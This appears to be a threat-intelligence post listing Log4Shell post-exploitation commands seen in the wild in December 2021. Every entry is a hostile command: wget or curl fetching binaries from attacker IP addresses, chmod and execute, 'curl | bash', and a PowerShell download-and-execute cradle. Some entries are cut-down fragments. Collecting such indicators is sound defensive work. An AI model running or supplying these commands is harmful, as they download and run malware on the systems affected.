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Last active December 17, 2021 05:28
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todays #Log4Shell activity observed:
- cd /usr/bin;wget http://155[.]94[.]154[.]170/bbb;curl -O http://155[.]94[.]154[.]170/bbb;chmod +x bbb;./bbb
- curl
- curl http://159[.]89[.]4[.]39/include/pyfpjn0.x86 -O /tmp/x86; chmod 777 /tmp/x86; ./tmp/x86 apache.exploit.x86
- curl http://2[.]56[.]59[.]123/1 --output 1; wget -O 1 http://2[.]56[.]59[.]123/1; chmod +x 1;./1
- curl http://83[.]97[.]20[.]171:6666
- curl -k https://41[.]157[.]42[.]239/ | bash
- echo 152[.]62[.]45[.]26:8443
- echo 168[.]159[.]209[.]96:8443
- wget http://159[.]89[.]4[.]39/include/pyfpjn0.x86 -O /tmp/x86; chmod 777 /tmp/x86; ./tmp/x86 apache.exploit.x86
- wget http://83[.]138[.]53[.]135/p -O /tmp/p;chmod +x /tmp/p; /tmp/p &
- wget http://152[.]67[.]63[.]150/; curl -O http://152[.]67[.]63[.]150/; bash 486xqw7ysXdKw7RkVzT5tdSiDtE6soxUdYaGaGE1GoaCdvBF7rVg5oMXL9pFx3rB1WUCZrJvd6AHMFWipeYt5eFNUx9pmGN
- curl -fsSL http://45[.]32[.]119[.]174:12229/termite/45[.]32[.]119[.]174:13333 -o /tmp/.Eh1L && chmod +x /tmp/.Eh1L && /tmp/.Eh1L
- echo 137[.]69[.]120[.]226:8443
- echo 152[.]62[.]177[.]26:8443
- powershell -c iex (( New-Object System.Net.WebClient ).DownloadString(''))
- cd /tmp;wget;curl -O;chmod +x bbb;./bbb
- wget; curl -O; chmod 777 py; ./py rce.x86
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